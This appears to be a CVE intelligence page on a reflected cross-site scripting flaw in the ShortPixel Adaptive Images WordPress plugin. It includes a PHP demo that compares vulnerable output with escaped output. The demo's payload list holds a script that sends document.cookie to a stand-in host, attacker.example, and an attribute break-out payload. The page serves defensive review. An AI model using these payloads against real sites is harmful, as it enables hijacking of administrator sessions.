Cyber Resilience

CVE-2023-0334

Medium · Public PoC

Published: 27 February 2023
Modified: 10 March 2025
KEV Added: not listed
Patch: not recorded
CVSS Score v3.1: 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
EPSS Score: 0.0813 (92.4th percentile)
Risk Priority: 17 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2023-0334 is a medium-severity reflected cross-site scripting vulnerability in the ShortPixel Adaptive Images WordPress plugin (versions before 3.6.3). Its CVSS v3.1 base score is 6.1 (Medium).

Operationally, its EPSS score places it in the top 7.6% of CVEs by exploit likelihood (92.4th percentile); it is not currently listed in the CISA KEV catalog; and a public proof-of-concept is referenced.

Deeper analysis

The ShortPixel Adaptive Images WordPress plugin before version 3.6.3 contains a reflected cross-site scripting vulnerability. The flaw arises because the plugin neither sanitises a request parameter on input nor escapes it before reflecting it into the page output, so an attacker-controlled value is rendered as markup; the intended targets are high-privilege users such as administrators. The CVSS 3.1 base score of 6.1 reflects a network attack vector with no privileges required, required user interaction (the victim must open a crafted link), and a changed scope, since the injected script executes in the victim's browser rather than in the vulnerable component itself.

An unauthenticated attacker can exploit the vulnerability by delivering a crafted URL to an administrator or other privileged user. If the victim opens the link in a browser that is logged in to the WordPress site, the attacker's JavaScript runs in that authenticated session, enabling actions such as session hijacking or unauthorized administrative changes (for example through the WordPress admin interface the victim is entitled to use).
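The following is an added example, not the ShortPixel plugin's code and not its 3.6.3 fix: it reproduces the reflected-output pattern the advisory describes next to the escaped form, and runs a reviewer-style check on both. The parameter name `sp_img` is a placeholder (the advisory does not name the affected parameter), and the `function_exists()` shims are rough stand-ins for the WordPress helpers `wp_unslash`, `sanitize_text_field`, `esc_html` and `esc_attr` so that the file runs under plain `php` outside WordPress.

```php
<?php
// Added example (not the ShortPixel plugin's code, and not its 3.6.3 fix):
// the reflected-XSS pattern the advisory describes, next to the escaped form.
// Assumptions: the parameter name "sp_img" is a placeholder, as the advisory
// does not name the affected parameter; the function_exists() shims below are
// rough stand-ins for the WordPress helpers so the file runs under plain `php`.

if (!function_exists('wp_unslash')) {
    // WordPress adds slashes to $_GET/$_POST; plugins strip them before use.
    function wp_unslash($value) {
        return is_array($value) ? array_map('wp_unslash', $value) : stripslashes($value);
    }
}
if (!function_exists('sanitize_text_field')) {
    // Approximation of WP's sanitize_text_field(): strip tags and control chars.
    function sanitize_text_field($str) {
        $str = strip_tags((string) $str);
        $str = preg_replace('/[\x00-\x1F\x7F]/', '', $str);
        return trim($str);
    }
}
if (!function_exists('esc_html')) {
    // Approximation of WP's esc_html(): entity-encode for the HTML body context.
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    // Approximation of WP's esc_attr(): entity-encode for an attribute context.
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable pattern: the request parameter is concatenated into markup as-is,
// once inside an attribute value and once in the page body.
function render_vulnerable(string $param): string {
    return '<input type="text" name="sp_img" value="' . $param . '">'
         . '<p>Could not load image: ' . $param . '</p>';
}

// Hardened pattern: unslash, sanitise on the way in, and escape for the exact
// output context (esc_attr inside the attribute, esc_html in the body).
function render_hardened(string $param): string {
    $value = sanitize_text_field(wp_unslash($param));
    return '<input type="text" name="sp_img" value="' . esc_attr($value) . '">'
         . '<p>Could not load image: ' . esc_html($value) . '</p>';
}

// Review check: does the attacker-controlled marker reach the page unencoded?
function reflects_unescaped(string $html, string $marker): bool {
    return strpos($html, $marker) !== false;
}

// Two constructed payloads an attacker could place in the URL sent to an admin.
$payloads = [
    // Tag injection: lands in the body context.
    'body tag'  => '<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
    // Attribute break-out: contains no tags, so tag stripping alone does not stop it.
    'attribute' => '" autofocus onfocus="alert(document.domain)',
];

foreach ($payloads as $name => $payload) {
    $vuln   = render_vulnerable($payload);
    $safe   = render_hardened($payload);
    $marker = ($name === 'body tag') ? '<script>' : 'onfocus="';
    printf("[%s]\n  vulnerable: %s\n  hardened:   %s\n  marker reflected raw: vulnerable=%s hardened=%s\n",
        $name, $vuln, $safe,
        reflects_unescaped($vuln, $marker) ? 'yes' : 'no',
        reflects_unescaped($safe, $marker) ? 'yes' : 'no');
}
```

The second payload is the caveat worth remembering when reviewing a fix of this kind: input sanitisation such as `sanitize_text_field()` strips tags but leaves a bare `"` intact, so it does nothing against a value that breaks out of an attribute. Only escaping at the output point, with the function that matches the context (`esc_attr` in an attribute, `esc_html` in body text), closes the hole; sanitising on input is defence in depth, not the fix.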

The associated EPSS probability rose from lower values to a recorded peak of 0.2661 before receding to the current score of 0.0813, indicating a period of elevated exploitation interest after public disclosure. The primary reference is the WPScan advisory that documents the reflected XSS condition and the affected plugin versions.

Vulnerability details

The ShortPixel Adaptive Images WordPress plugin before 3.6.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against any high privilege users such as admin

CWE(s)
None listed on this page. The described flaw, a request parameter reflected into page output without escaping, is the pattern catalogued as CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting").

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

Vendor: ShortPixel
Product: ShortPixel Adaptive Images (WordPress plugin)
Versions: before 3.6.3 (the advisory states that versions prior to 3.6.3 are affected; 3.6.3 is the fixed release)

Mitigating Controls

No mitigating controls mapped yet. The corrective action supported by the advisory is to update the plugin to version 3.6.3 or later, since every earlier version is affected.
